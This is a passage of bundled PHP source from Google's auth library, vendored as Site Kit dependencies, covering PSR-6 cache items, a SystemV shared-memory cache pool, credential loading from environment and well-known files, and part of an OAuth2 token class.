isHit() { if (!$this->isHit) { return \false; } if ($this->expiration === null) { return \true; } return $this->currentTime()->getTimestamp() < $this->expiration->getTimestamp(); } /** * {@inheritdoc} */ public function set($value) { $this->isHit = \true; $this->value = $value; return $this; } /** * {@inheritdoc} */ public function expiresAt($expiration) { if ($this->isValidExpiration($expiration)) { $this->expiration = $expiration; return $this; } $error = \sprintf('Argument 1 passed to %s::expiresAt() must implement interface DateTimeInterface, %s given', \get_class($this), \gettype($expiration)); throw new \TypeError($error); } /** * {@inheritdoc} */ public function expiresAfter($time) { if (\is_int($time)) { $this->expiration = $this->currentTime()->add(new \DateInterval("PT{$time}S")); } elseif ($time instanceof \DateInterval) { $this->expiration = $this->currentTime()->add($time); } elseif ($time === null) { $this->expiration = $time; } else { $message = 'Argument 1 passed to %s::expiresAfter() must be an ' . 'instance of DateInterval or of the type integer, %s given'; $error = \sprintf($message, \get_class($this), \gettype($time)); throw new \TypeError($error); } return $this; } /** * Determines if an expiration is valid based on the rules defined by PSR6. * * @param mixed $expiration * @return bool */ private function isValidExpiration($expiration) { if ($expiration === null) { return \true; } if ($expiration instanceof \DateTimeInterface) { return \true; } return \false; } /** * @return DateTime */ protected function currentTime() { return new \DateTime('now', new \DateTimeZone('UTC')); } } <?php /* * Copyright 2022 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Cache; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface; /** * A cache item. * * This class will be used by MemoryCacheItemPool and SysVCacheItemPool * on PHP 8.0 and above. It is compatible with psr/cache 3.0 (PSR-6). * @see Item for compatiblity with previous versions of PHP. */ final class TypedItem implements \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface { /** * @var mixed */ private mixed $value; /** * @var \DateTimeInterface|null */ private ?\DateTimeInterface $expiration; /** * @var bool */ private bool $isHit = \false; /** * @param string $key */ public function __construct(private string $key) { $this->key = $key; $this->expiration = null; } /** * {@inheritdoc} */ public function getKey() : string { return $this->key; } /** * {@inheritdoc} */ public function get() : mixed { return $this->isHit() ? $this->value : null; } /** * {@inheritdoc} */ public function isHit() : bool { if (!$this->isHit) { return \false; } if ($this->expiration === null) { return \true; } return $this->currentTime()->getTimestamp() < $this->expiration->getTimestamp(); } /** * {@inheritdoc} */ public function set(mixed $value) : static { $this->isHit = \true; $this->value = $value; return $this; } /** * {@inheritdoc} */ public function expiresAt($expiration) : static { if ($this->isValidExpiration($expiration)) { $this->expiration = $expiration; return $this; } $error = \sprintf('Argument 1 passed to %s::expiresAt() must implement interface DateTimeInterface, %s given', \get_class($this), \gettype($expiration)); throw new \TypeError($error); } /** * {@inheritdoc} */ public function expiresAfter($time) : static { if (\is_int($time)) { $this->expiration = $this->currentTime()->add(new \DateInterval("PT{$time}S")); } elseif ($time instanceof \DateInterval) { $this->expiration = $this->currentTime()->add($time); } elseif ($time === null) { $this->expiration = $time; } else { $message = 'Argument 1 passed to %s::expiresAfter() must be an ' . 'instance of DateInterval or of the type integer, %s given'; $error = \sprintf($message, \get_class($this), \gettype($time)); throw new \TypeError($error); } return $this; } /** * Determines if an expiration is valid based on the rules defined by PSR6. * * @param mixed $expiration * @return bool */ private function isValidExpiration($expiration) { if ($expiration === null) { return \true; } // We test for two types here due to the fact the DateTimeInterface // was not introduced until PHP 5.5. Checking for the DateTime type as // well allows us to support 5.4. if ($expiration instanceof \DateTimeInterface) { return \true; } return \false; } /** * @return \DateTime */ protected function currentTime() { return new \DateTime('now', new \DateTimeZone('UTC')); } } <?php /** * Copyright 2018 Google Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Cache; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * SystemV shared memory based CacheItemPool implementation. * * This CacheItemPool implementation can be used among multiple processes, but * it doesn't provide any locking mechanism. If multiple processes write to * this ItemPool, you have to avoid race condition manually in your code. */ class SysVCacheItemPool implements \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface { const VAR_KEY = 1; const DEFAULT_PROJ = 'A'; const DEFAULT_MEMSIZE = 10000; const DEFAULT_PERM = 0600; /** * @var int */ private $sysvKey; /** * @var CacheItemInterface[] */ private $items; /** * @var CacheItemInterface[] */ private $deferredItems; /** * @var array<mixed> */ private $options; /** * @var bool */ private $hasLoadedItems = \false; /** * Create a SystemV shared memory based CacheItemPool. * * @param array<mixed> $options { * [optional] Configuration options. * * @type int $variableKey The variable key for getting the data from the shared memory. **Defaults to** 1. * @type string $proj The project identifier for ftok. This needs to be a one character string. * **Defaults to** 'A'. * @type int $memsize The memory size in bytes for shm_attach. **Defaults to** 10000. * @type int $perm The permission for shm_attach. **Defaults to** 0600. * } */ public function __construct($options = []) { if (!\extension_loaded('sysvshm')) { throw new \RuntimeException('sysvshm extension is required to use this ItemPool'); } $this->options = $options + ['variableKey' => self::VAR_KEY, 'proj' => self::DEFAULT_PROJ, 'memsize' => self::DEFAULT_MEMSIZE, 'perm' => self::DEFAULT_PERM]; $this->items = []; $this->deferredItems = []; $this->sysvKey = \ftok(__FILE__, $this->options['proj']); } /** * @param mixed $key * @return CacheItemInterface */ public function getItem($key) : \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface { $this->loadItems(); return \current($this->getItems([$key])); // @phpstan-ignore-line } /** * @param array<mixed> $keys * @return iterable<CacheItemInterface> */ public function getItems(array $keys = []) : iterable { $this->loadItems(); $items = []; $itemClass = \PHP_VERSION_ID >= 80000 ? \Google\Site_Kit_Dependencies\Google\Auth\Cache\TypedItem::class : \Google\Site_Kit_Dependencies\Google\Auth\Cache\Item::class; foreach ($keys as $key) { $items[$key] = $this->hasItem($key) ? clone $this->items[$key] : new $itemClass($key); } return $items; } /** * {@inheritdoc} */ public function hasItem($key) : bool { $this->loadItems(); return isset($this->items[$key]) && $this->items[$key]->isHit(); } /** * {@inheritdoc} */ public function clear() : bool { $this->items = []; $this->deferredItems = []; return $this->saveCurrentItems(); } /** * {@inheritdoc} */ public function deleteItem($key) : bool { return $this->deleteItems([$key]); } /** * {@inheritdoc} */ public function deleteItems(array $keys) : bool { if (!$this->hasLoadedItems) { $this->loadItems(); } foreach ($keys as $key) { unset($this->items[$key]); } return $this->saveCurrentItems(); } /** * {@inheritdoc} */ public function save(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface $item) : bool { if (!$this->hasLoadedItems) { $this->loadItems(); } $this->items[$item->getKey()] = $item; return $this->saveCurrentItems(); } /** * {@inheritdoc} */ public function saveDeferred(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface $item) : bool { $this->deferredItems[$item->getKey()] = $item; return \true; } /** * {@inheritdoc} */ public function commit() : bool { foreach ($this->deferredItems as $item) { if ($this->save($item) === \false) { return \false; } } $this->deferredItems = []; return \true; } /** * Save the current items. * * @return bool true when success, false upon failure */ private function saveCurrentItems() { $shmid = \shm_attach($this->sysvKey, $this->options['memsize'], $this->options['perm']); if ($shmid !== \false) { $ret = \shm_put_var($shmid, $this->options['variableKey'], $this->items); \shm_detach($shmid); return $ret; } return \false; } /** * Load the items from the shared memory. * * @return bool true when success, false upon failure */ private function loadItems() { $shmid = \shm_attach($this->sysvKey, $this->options['memsize'], $this->options['perm']); if ($shmid !== \false) { $data = @\shm_get_var($shmid, $this->options['variableKey']); if (!empty($data)) { $this->items = $data; } else { $this->items = []; } \shm_detach($shmid); $this->hasLoadedItems = \true; return \true; } return \false; } } <?php /* * Copyright 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Cache; use Google\Site_Kit_Dependencies\Psr\Cache\InvalidArgumentException as PsrInvalidArgumentException; class InvalidArgumentException extends \InvalidArgumentException implements \Google\Site_Kit_Dependencies\Psr\Cache\InvalidArgumentException { } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\ExternalAccountCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\ImpersonatedServiceAccountCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\InsecureCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\UserRefreshCredentials; use RuntimeException; use UnexpectedValueException; /** * CredentialsLoader contains the behaviour used to locate and find default * credentials files on the file system. */ abstract class CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface, \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface, \Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface { use UpdateMetadataTrait; const TOKEN_CREDENTIAL_URI = 'https://oauth2.googleapis.com/token'; const ENV_VAR = 'GOOGLE_APPLICATION_CREDENTIALS'; const QUOTA_PROJECT_ENV_VAR = 'GOOGLE_CLOUD_QUOTA_PROJECT'; const WELL_KNOWN_PATH = 'gcloud/application_default_credentials.json'; const NON_WINDOWS_WELL_KNOWN_PATH_BASE = '.config'; const MTLS_WELL_KNOWN_PATH = '.secureConnect/context_aware_metadata.json'; const MTLS_CERT_ENV_VAR = 'GOOGLE_API_USE_CLIENT_CERTIFICATE'; /** * @param string $cause * @return string */ private static function unableToReadEnv($cause) { $msg = 'Unable to read the credential file specified by '; $msg .= ' GOOGLE_APPLICATION_CREDENTIALS: '; $msg .= $cause; return $msg; } /** * @return bool */ private static function isOnWindows() { return \strtoupper(\substr(\PHP_OS, 0, 3)) === 'WIN'; } /** * Load a JSON key from the path specified in the environment. * * Load a JSON key from the path specified in the environment * variable GOOGLE_APPLICATION_CREDENTIALS. Return null if * GOOGLE_APPLICATION_CREDENTIALS is not specified. * * @return array<mixed>|null JSON key | null */ public static function fromEnv() { $path = \getenv(self::ENV_VAR); if (empty($path)) { return null; } if (!\file_exists($path)) { $cause = 'file ' . $path . ' does not exist'; throw new \DomainException(self::unableToReadEnv($cause)); } $jsonKey = \file_get_contents($path); return \json_decode((string) $jsonKey, \true); } /** * Load a JSON key from a well known path. * * The well known path is OS dependent: * * * windows: %APPDATA%/gcloud/application_default_credentials.json * * others: $HOME/.config/gcloud/application_default_credentials.json * * If the file does not exist, this returns null. * * @return array<mixed>|null JSON key | null */ public static function fromWellKnownFile() { $rootEnv = self::isOnWindows() ? 'APPDATA' : 'HOME'; $path = [\getenv($rootEnv)]; if (!self::isOnWindows()) { $path[] = self::NON_WINDOWS_WELL_KNOWN_PATH_BASE; } $path[] = self::WELL_KNOWN_PATH; $path = \implode(\DIRECTORY_SEPARATOR, $path); if (!\file_exists($path)) { return null; } $jsonKey = \file_get_contents($path); return \json_decode((string) $jsonKey, \true); } /** * Create a new Credentials instance. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param array<mixed> $jsonKey the JSON credentials. * @param string|string[] $defaultScope The default scope to use if no * user-defined scopes exist, expressed either as an Array or as a * space-delimited string. * * @return ServiceAccountCredentials|UserRefreshCredentials|ImpersonatedServiceAccountCredentials|ExternalAccountCredentials */ public static function makeCredentials($scope, array $jsonKey, $defaultScope = null) { if (!\array_key_exists('type', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the type field'); } if ($jsonKey['type'] == 'service_account') { // Do not pass $defaultScope to ServiceAccountCredentials return new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountCredentials($scope, $jsonKey); } if ($jsonKey['type'] == 'authorized_user') { $anyScope = $scope ?: $defaultScope; return new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\UserRefreshCredentials($anyScope, $jsonKey); } if ($jsonKey['type'] == 'impersonated_service_account') { $anyScope = $scope ?: $defaultScope; return new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ImpersonatedServiceAccountCredentials($anyScope, $jsonKey); } if ($jsonKey['type'] == 'external_account') { $anyScope = $scope ?: $defaultScope; return new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ExternalAccountCredentials($anyScope, $jsonKey); } throw new \InvalidArgumentException('invalid value in the type field'); } /** * Create an authorized HTTP Client from an instance of FetchAuthTokenInterface. * * @param FetchAuthTokenInterface $fetcher is used to fetch the auth token * @param array<mixed> $httpClientOptions (optional) Array of request options to apply. * @param callable $httpHandler (optional) http client to fetch the token. * @param callable $tokenCallback (optional) function to be called when a new token is fetched. * @return \GuzzleHttp\Client */ public static function makeHttpClient(\Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface $fetcher, array $httpClientOptions = [], ?callable $httpHandler = null, ?callable $tokenCallback = null) { $middleware = new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\AuthTokenMiddleware($fetcher, $httpHandler, $tokenCallback); $stack = \Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack::create(); $stack->push($middleware); return new \Google\Site_Kit_Dependencies\GuzzleHttp\Client(['handler' => $stack, 'auth' => 'google_auth'] + $httpClientOptions); } /** * Create a new instance of InsecureCredentials. * * @return InsecureCredentials */ public static function makeInsecureCredentials() { return new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\InsecureCredentials(); } /** * Fetch a quota project from the environment variable * GOOGLE_CLOUD_QUOTA_PROJECT. Return null if * GOOGLE_CLOUD_QUOTA_PROJECT is not specified. * * @return string|null */ public static function quotaProjectFromEnv() { return \getenv(self::QUOTA_PROJECT_ENV_VAR) ?: null; } /** * Gets a callable which returns the default device certification. * * @throws UnexpectedValueException * @return callable|null */ public static function getDefaultClientCertSource() { if (!($clientCertSourceJson = self::loadDefaultClientCertSourceFile())) { return null; } $clientCertSourceCmd = $clientCertSourceJson['cert_provider_command']; return function () use($clientCertSourceCmd) { $cmd = \array_map('escapeshellarg', $clientCertSourceCmd); \exec(\implode(' ', $cmd), $output, $returnVar); if (0 === $returnVar) { return \implode(\PHP_EOL, $output); } throw new \RuntimeException('"cert_provider_command" failed with a nonzero exit code'); }; } /** * Determines whether or not the default device certificate should be loaded. * * @return bool */ public static function shouldLoadClientCertSource() { return \filter_var(\getenv(self::MTLS_CERT_ENV_VAR), \FILTER_VALIDATE_BOOLEAN); } /** * @return array{cert_provider_command:string[]}|null */ private static function loadDefaultClientCertSourceFile() { $rootEnv = self::isOnWindows() ? 'APPDATA' : 'HOME'; $path = \sprintf('%s/%s', \getenv($rootEnv), self::MTLS_WELL_KNOWN_PATH); if (!\file_exists($path)) { return null; } $jsonKey = \file_get_contents($path); $clientCertSourceJson = \json_decode((string) $jsonKey, \true); if (!$clientCertSourceJson) { throw new \UnexpectedValueException('Invalid client cert source JSON'); } if (!isset($clientCertSourceJson['cert_provider_command'])) { throw new \UnexpectedValueException('cert source requires "cert_provider_command"'); } if (!\is_array($clientCertSourceJson['cert_provider_command'])) { throw new \UnexpectedValueException('cert source expects "cert_provider_command" to be an array'); } return $clientCertSourceJson; } /** * Get the universe domain from the credential. Defaults to "googleapis.com" * for all credential types which do not support universe domain. * * @return string */ public function getUniverseDomain() : string { return self::DEFAULT_UNIVERSE_DOMAIN; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\Firebase\JWT\JWT; use Google\Site_Kit_Dependencies\Firebase\JWT\Key; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * OAuth2 supports authentication by OAuth2 2-legged flows. * * It primary supports * - service account authorization * - authorization where a user already has an access token */ class OAuth2 implements \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface { const DEFAULT_EXPIRY_SECONDS = 3600; // 1 hour const DEFAULT_SKEW_SECONDS = 60; // 1 minute const JWT_URN = 'urn:ietf:params:oauth:grant-type:jwt-bearer'; const STS_URN = 'urn:ietf:params:oauth:grant-type:token-exchange'; private const STS_REQUESTED_TOKEN_TYPE = 'urn:ietf:params:oauth:token-type:access_token'; /** * TODO: determine known methods from the keys of JWT::methods. * * @var array<string> */ public static $knownSigningAlgorithms = ['HS256', 'HS512', 'HS384', 'RS256']; /** * The well known grant types. * * @var array<string> */ public static $knownGrantTypes = ['authorization_code', 'refresh_token', 'password', 'client_credentials']; /** * - authorizationUri * The authorization server's HTTP endpoint capable of * authenticating the end-user and obtaining authorization. * * @var ?UriInterface */ private $authorizationUri; /** * - tokenCredentialUri * The authorization server's HTTP endpoint capable of issuing * tokens and refreshing expired tokens. * * @var UriInterface */ private $tokenCredentialUri; /** * The redirection URI used in the initial request. * * @var ?string */ private $redirectUri; /** * A unique identifier issued to the client to identify itself to the * authorization server. * * @var string */ private $clientId; /** * A shared symmetric secret issued by the authorization server, which is * used to authenticate the client. * * @var string */ private $clientSecret; /** * The resource owner's username. * * @var ?string */ private $username; /** * The resource owner's password. * * @var ?string */ private $password; /** * The scope of the access request, expressed either as an Array or as a * space-delimited string. * * @var ?array<string> */ private $scope; /** * An arbitrary string designed to allow the client to maintain state. * * @var string */ private $state; /** * The authorization code issued to this client. * * Only used by the authorization code access grant type. * * @var ?string */ private $code; /** * The issuer ID when using assertion profile. * * @var ?string */ private $issuer; /** * The target audience for assertions. * * @var string */ private $audience; /** * The target sub when issuing assertions. * * @var string */ private $sub; /** * The number of seconds assertions are valid for. * * @var int */ private $expiry; /** * The signing key when using assertion profile. * * @var ?string */ private $signingKey; /** * The signing key id when using assertion profile. Param kid in jwt header * * @var string */ private $signingKeyId; /** * The signing algorithm when using an assertion profile. * * @var ?string */ private $signingAlgorithm; /** * The refresh token associated with the access token to be refreshed. * * @var ?string */ private $refreshToken; /** * The current access token. * * @var string */ private $accessToken; /** * The current ID token. * * @var string */ private $idToken; /** * The scopes granted to the current access token * * @var string */ private $grantedScope; /** * The lifetime in seconds of the current access token. * * @var ?int */ private $expiresIn; /** * The expiration time of the access token as a number of seconds since the * unix epoch. * * @var ?int */ private $expiresAt; /** * The issue time of the access token as a number of seconds since the unix * epoch. * * @var ?int */ private $issuedAt; /** * The current grant type. * * @var ?string */ private $grantType; /** * When using an extension grant type, this is the set of parameters used by * that extension. * * @var array<mixed> */ private $extensionParams; /** * When using the toJwt function, these claims will be added to the JWT * payload. * * @var array<mixed> */ private $additionalClaims; /** * The code verifier for PKCE for OAuth 2.0. When set, the authorization * URI will contain the Code Challenge and Code Challenge Method querystring * parameters, and the token URI will contain the Code Verifier parameter. * * @see https://datatracker.ietf.org/doc/html/rfc7636 * @var ?string */ private $codeVerifier; /** * For STS requests. * A URI that indicates the target service or resource where the client * intends to use the requested security token. */ private ?string $resource; /** * For STS requests. * A fetcher for the "subject_token", which is a security token that * represents the identity of the party on behalf of whom the request is * being made. */ private ?\Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface $subjectTokenFetcher; /** * For STS requests. * An identifier, that indicates the type of the security token in the * subjectToken parameter. */ private ?string $subjectTokenType; /** * For STS requests. * A security token that represents the identity of the acting party. */ private ?string $actorToken; /** * For STS requests. * An identifier that indicates the type of the security token in the * actorToken parameter. */ private ?string $actorTokenType; /** * From STS response. * An identifier for the representation of the issued security token. */ private ?string $issuedTokenType = null; /** * From STS response. * An identifier for the representation of the issued security token. * * @var array<mixed> */ private array $additionalOptions; /** * Create a new OAuthCredentials. * * The configuration array accepts various options * * - authorizationUri * The authorization server's HTTP endpoint capable of * authenticating the end-user and obtaining authorization. * * - tokenCredentialUri * The authorization server's HTTP endpoint capable of issuing * tokens and refreshing expired tokens. * * - clientId * A unique identifier issued to the client to identify itself to the * authorization server. * * - clientSecret * A shared symmetric secret issued by the authorization server, * which is used to authenticate the client. * * - scope * The scope of the access request, expressed either as an Array * or as a space-delimited String. * * - state * An arbitrary string designed to allow the client to maintain state. * * - redirectUri * The redirection URI used in the initial request. * * - username * The resource owner's username. * * - password * The resource owner's password. * * - issuer * Issuer ID when using assertion profile * * - audience * Target audience for assertions * * - expiry * Number of seconds assertions are valid for * * - signingKey * Signing key when using assertion profile * * - signingKeyId * Signing key id when using assertion profile * * - refreshToken * The refresh token associated with the access token * to be refreshed. * * - accessToken * The current access token for this client. * * - idToken * The current ID token for this client. * * - extensionParams * When using an extension grant type, this is the set of parameters used * by that extension. * * - codeVerifier * The code verifier for PKCE for OAuth 2.0. * * - resource * The target service or resource where the client ntends to use the * requested security token. * * - subjectTokenFetcher * A fetcher for the "subject_token", which is a security token that * represents the identity of the party on behalf of whom the request is * being made. * * - subjectTokenType * An identifier that indicates the type of the security token in the * subjectToken parameter. * * - actorToken * A security token that represents the identity of the acting party. * * - actorTokenType * An identifier for the representation of the issued security token. * * @param array<mixed> $config Configuration array */ public function __construct(array $config) { $opts = \array_merge(['expiry' => self::DEFAULT_EXPIRY_SECONDS, 'extensionParams' => [], 'authorizationUri' => null, 'redirectUri' => null, 'tokenCredentialUri' => null, 'state' => null, 'username' => null, 'password' => null, 'clientId' => null, 'clientSecret' => null, 'issuer' => null, 'sub' => null, 'audience' => null, 'signingKey' => null, 'signingKeyId' => null, 'signingAlgorithm' => null, 'scope' => null, 'additionalClaims' => [], 'codeVerifier' => null, 'resource' => null, 'subjectTokenFetcher' => null, 'subjectTokenType' => null, 'actorToken' => null, 'actorTokenType' => null, 'additionalOptions' => []], $config); $this->setAuthorizationUri($opts['authorizationUri']); $this->setRedirectUri($opts['redirectUri']); $this->setTokenCredentialUri($opts['tokenCredentialUri']); $this->setState($opts['state']); $this->setUsername($opts['username']); $this->setPassword($opts['password']); $this->setClientId($opts['clientId']); $this->setClientSecret($opts['clientSecret']); $this->setIssuer($opts['issuer']); $this->setSub($opts['sub']); $this->setExpiry($opts['expiry']); $this->setAudience($opts['audience']); $this->setSigningKey($opts['signingKey']); $this->setSigningKeyId($opts['signingKeyId']); $this->setSigningAlgorithm($opts['signingAlgorithm']); $this->setScope($opts['scope']); $this->setExtensionParams($opts['extensionParams']); $this->setAdditionalClaims($opts['additionalClaims']); $this->setCodeVerifier($opts['codeVerifier']); // for STS $this->resource = $opts['resource']; $this->subjectTokenFetcher = $opts['subjectTokenFetcher']; $this->subjectTokenType = $opts['subjectTokenType']; $this->actorToken = $opts['actorToken']; $this->actorTokenType = $opts['actorTokenType']; $this->additionalOptions = $opts['additionalOptions']; $this->updateToken($opts); } /** * Verifies the idToken if present. * * - if none is present, return null * - if present, but invalid, raises DomainException. * - otherwise returns the payload in the idtoken as a PHP object. * * The behavior of this method varies depending on the version of * `firebase/php-jwt` you are using. In versions 6.0 and above, you cannot * provide multiple $allowed_algs, and instead must provide an array of Key * objects as the $publicKey. * * @param string|Key|Key[] $publicKey The public key to use to authenticate the token * @param string|array<string> $allowed_algs algorithm or array of supported verification algorithms. * Providing more than one algorithm will throw an exception. * @throws \DomainException if the token is missing an audience. * @throws \DomainException if the audience does not match the one set in * the OAuth2 class instance. * @throws \UnexpectedValueException If the token is invalid * @throws \InvalidArgumentException If more than one value for allowed_algs is supplied * @throws \Firebase\JWT\SignatureInvalidException If the signature is invalid. * @throws \Firebase\JWT\BeforeValidException If the token is not yet valid. * @throws \Firebase\JWT\ExpiredException If the token has expired. * @return null|object */ public function verifyIdToken($publicKey = null, $allowed_algs = []) { $idToken = $this->getIdToken(); if (\is_null($idToken)) { return null; } $resp = $this->jwtDecode($idToken, $publicKey, $allowed_algs); if (!\property_exists($resp, 'aud')) { throw new \DomainException('No audience found the id token'); } if ($resp->aud != $this->getAudience()) { throw new \DomainException('Wrong audience present in the id token'); } return $resp; } /** * Obtains the encoded jwt from the instance data. * * @param array<mixed> $config array optional configuration parameters * @return string */ public function toJwt(array $config = []) { if (\is_null($this->getSigningKey())) { throw new \DomainException('No signing key available'); } if (\is_null($this->getSigningAlgorithm())) { throw new \DomainException('No signing algorithm specified'); } $now = \time(); $opts = \array_merge(['skew' => self::DEFAULT_SKEW_SECONDS], $config); $assertion = ['iss' => $this->getIssuer(), 'exp' => $now + $this->getExpiry(), 'iat' => $now - $opts['skew']]; foreach ($assertion as $k => $v) { if (\is_null($v)) { throw new \DomainException($k . ' should not be null'); } } if (!\is_null($this->getAudience())) { $assertion['aud'] = $this->getAudience(); } if (!\is_null($this->getScope())) { $assertion['scope'] = $this->getScope(); } if (empty($assertion['scope']) && empty($assertion['aud'])) { throw new \DomainException('one of scope or aud should not be null'); } if (!\is_null($this->getSub())) { $assertion['sub'] = $this->getSub(); } $assertion += $this->getAdditionalClaims(); return \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::encode($assertion, $this->getSigningKey(), $this->getSigningAlgorithm(), $this->getSigningKeyId()); } /** * Generates a request for token credentials. * * @param callable $httpHandler callback which delivers psr7 request * @return RequestInterface the authorization Url. */ public function generateCredentialsRequest(?callable $httpHandler = null) { $uri = $this->getTokenCredentialUri(); if (\is_null($uri)) { throw new \DomainException('No token credential URI was set.'); } $grantType = $this->getGrantType(); $params = ['grant_type' => $grantType]; switch ($grantType) { case 'authorization_code': $params['code'] = $this->getCode(); $params['redirect_uri'] = $this->getRedirectUri(); if ($this->codeVerifier) { $params['code_verifier'] = $this->codeVerifier; } $this->addClientCredentials($params); break; case 'password': $params['username'] = $this->getUsername(); $params['password'] = $this->getPassword(); $this->addClientCredentials($params); break; case 'refresh_token': $params['refresh_token'] = $this->getRefreshToken(); $this->addClientCredentials($params); break; case self::JWT_URN: $params['assertion'] = $this->toJwt(); break; case self::STS_URN: $token = $this->subjectTokenFetcher->fetchSubjectToken($httpHandler); $params['subject_token'] = $token; $params['subject_token_type'] = $this->subjectTokenType; $params += \array_filter(['resource' => $this->resource, 'audience' => $this->audience, 'scope' => $this->getScope(), 'requested_token_type' => self::STS_REQUESTED_TOKEN_TYPE, 'actor_token' => $this->actorToken, 'actor_token_type' => $this->actorTokenType]); if ($this->additionalOptions) { $params['options'] = \json_encode($this->additionalOptions); } break; default: if (!\is_null($this->getRedirectUri())) { # Grant type was supposed to be 'authorization_code', as there # is a redirect URI. throw new \DomainException('Missing authorization code'); } unset($params['grant_type']); if (!\is_null($grantType)) { $params['grant_type'] = $grantType; } $params = \array_merge($params, $this->getExtensionParams()); } $headers = ['Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded']; return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('POST', $uri, $headers, \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query::build($params)); } /** * Fetches the auth tokens based on the current state. * * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> the response */ public function fetchAuthToken(?callable $httpHandler = null) { if (\is_null($httpHandler)) { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); } $response = $httpHandler($this->generateCredentialsRequest($httpHandler)); $credentials = $this->parseTokenResponse($response); $this->updateToken($credentials); if (isset($credentials['scope'])) { $this->setGrantedScope($credentials['scope']); } return $credentials; } /** * Obtains a key that can used to cache the results of #fetchAuthToken. * * The key is derived from the scopes. * * @return ?string a key that may be used to cache the auth token. */ public function getCacheKey() { if (\is_array($this->scope)) { return \implode(':', $this->scope); } if ($this->audience) { return $this->audience; } // If scope has not set, return null to indicate no caching. return null; } /** * Parses the fetched tokens. * * @param ResponseInterface $resp the response. * @return array<mixed> the tokens parsed from the response body. * @throws \Exception */ public function parseTokenResponse(\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $resp) { $body = (string) $resp->getBody(); if 